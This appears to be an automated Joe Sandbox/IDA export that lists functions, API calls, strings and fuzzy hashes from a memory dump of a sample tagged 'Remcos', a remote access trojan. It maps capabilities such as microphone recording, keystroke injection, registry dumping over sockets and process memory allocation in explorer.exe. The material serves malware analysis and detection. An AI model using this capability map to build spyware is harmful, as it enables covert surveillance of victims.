Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E

Uniqueness

Uniqueness Score: -1.00%

Function 0044B3BC Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
__fassign.LIBCMT ref: 0044B479
__fassign.LIBCMT ref: 0044B494
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B4D9
WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B512

Strings

PkGNG, xrefs: 0044B3BE

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID: PkGNG
API String ID: 1324828854-263838557
Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E

Sleep.KERNEL32(00000064), ref: 00417521
DeleteFileW.KERNEL32(00000000), ref: 00417555

Strings

\sysinfo.txt, xrefs: 004174A0
/t , xrefs: 004174D4
open, xrefs: 004174EF
dxdiag, xrefs: 004174EA
temp, xrefs: 004174A5

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 1462127192-2001430897
Opcode ID: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
Opcode Fuzzy Hash: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C

Uniqueness

Uniqueness Score: -1.00%

Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe), ref: 0040749E

Strings

\explorer.exe, xrefs: 00407400
windir, xrefs: 004073EA
PEB: %x, xrefs: 004074AF
[+] NtAllocateVirtualMemory Success, xrefs: 00407410
[-] NtAllocateVirtualMemory Error, xrefs: 0040743D
explorer.exe, xrefs: 00407450, 0040747B

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
API String ID: 2050909247-4242073005
Opcode ID: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
Opcode Fuzzy Hash: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F

Uniqueness

Uniqueness Score: -1.00%

Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 00401D50

Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9

waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F

Strings

.wav, xrefs: 00401D69
dMG, xrefs: 00401D81
%Y-%m-%d %H.%M, xrefs: 00401D41
|MG, xrefs: 00401E08

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
API String ID: 3809562944-243156785
Opcode ID: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
Opcode Fuzzy Hash: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00410E61 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
int.LIBCPMT ref: 00410E81

Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC

std::_Facet_Register.LIBCPMT ref: 00410EC1
std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
__CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
__Init_thread_footer.LIBCMT ref: 00410F29

Strings

,kG, xrefs: 00410F04
0kG, xrefs: 00410F31

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
String ID: ,kG$0kG
API String ID: 3815856325-2015055088
Opcode ID: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
Opcode Fuzzy Hash: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
waveInStart.WINMM ref: 00401CFE

Strings

PG, xrefs: 00401C27
|MG, xrefs: 00401C9B
dMG, xrefs: 00401BED

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID: dMG$|MG$PG
API String ID: 1356121797-532278878
Opcode ID: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
Opcode Fuzzy Hash: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476

Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580

ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
TranslateMessage.USER32(?), ref: 0041D4E9
DispatchMessageA.USER32(?), ref: 0041D4F3
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500

Strings

Remcos, xrefs: 0041D4B8

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
Opcode Fuzzy Hash: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

_memcmp.LIBVCRUNTIME ref: 00445423
_free.LIBCMT ref: 00445494
_free.LIBCMT ref: 004454AD
_free.LIBCMT ref: 004454DF
_free.LIBCMT ref: 004454E8
_free.LIBCMT ref: 004454F4

Strings

C, xrefs: 004452E1

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
Opcode Fuzzy Hash: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON

Download Yara Rule

Strings

udp, xrefs: 00414A46
tcp, xrefs: 00414A73

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID:
String ID: tcp$udp
API String ID: 0-3725065008
Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00411CFE Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2

SetLastError.KERNEL32(000000C1,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
GetNativeSystemInfo.KERNEL32(?,?,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
SetLastError.KERNEL32(0000000E), ref: 00411DC9

Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,00411DE7,?,00000000,00003000,00000040,00000000), ref: 00411CB3

GetProcessHeap.KERNEL32(00000008,00000040), ref: 00411E10
HeapAlloc.KERNEL32(00000000), ref: 00411E17
SetLastError.KERNEL32(0000045A), ref: 00411F2A

Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE

Strings

t^F, xrefs: 00411D02

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
String ID: t^F
API String ID: 3950776272-389975521
Opcode ID: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
Opcode Fuzzy Hash: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004018BE
ExitThread.KERNEL32 ref: 004018F6
waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

Strings

XMG, xrefs: 00401902
NG, xrefs: 00401990
PkG, xrefs: 00401888
NG, xrefs: 0040190D

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
String ID: PkG$XMG$NG$NG
API String ID: 1649129571-3151166067
Opcode ID: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
Opcode Fuzzy Hash: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E

Uniqueness

Uniqueness Score: -1.00%

Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5

Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3

Strings

.part, xrefs: 00407989

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
String ID: .part
API String ID: 1303771098-3499674018
Opcode ID: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
Opcode Fuzzy Hash: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97

Uniqueness

Uniqueness Score: -1.00%

Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00447679
__freea.LIBCMT ref: 00447723
__freea.LIBCMT ref: 00447741

Part of subcall function 00435E40: _free.LIBCMT ref: 00435E56

Strings

am/pm, xrefs: 004477A4
a/p, xrefs: 00447808
zD, xrefs: 004479AB

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16_free
String ID: a/p$am/pm$zD
API String ID: 2936374016-2723203690
Opcode ID: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
Opcode Fuzzy Hash: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B

Strings

TG, xrefs: 00413BFD
[regsplt], xrefs: 00413C17
xUG, xrefs: 00413C46

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]$xUG$TG
API String ID: 3554306468-1165877943
Opcode ID: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
Opcode Fuzzy Hash: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00456D49

Strings

D[E, xrefs: 00456C6D, 00456D5E
D[E, xrefs: 00456D10

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: _free
String ID: D[E$D[E
API String ID: 269201875-3695742444
Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D

Uniqueness

Uniqueness Score: -1.00%

Function 00413D0D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46

Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4

Strings

NG, xrefs: 00413D69
xUG, xrefs: 00413EA6
NG, xrefs: 00413E23
TG, xrefs: 00413E9A

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CloseEnumInfoOpenQuerysend
String ID: xUG$NG$NG$TG
API String ID: 3114080316-2811732169
Opcode ID: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
Opcode Fuzzy Hash: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E

Uniqueness

Uniqueness Score: -1.00%

Function 0045112C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
__alloca_probe_16.LIBCMT ref: 004511B1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
__freea.LIBCMT ref: 0045121D

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169

Strings

PkGNG, xrefs: 0045112E

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID: PkGNG
API String ID: 313313983-263838557
Opcode ID: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
Opcode Fuzzy Hash: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94

Uniqueness

Uniqueness Score: -1.00%

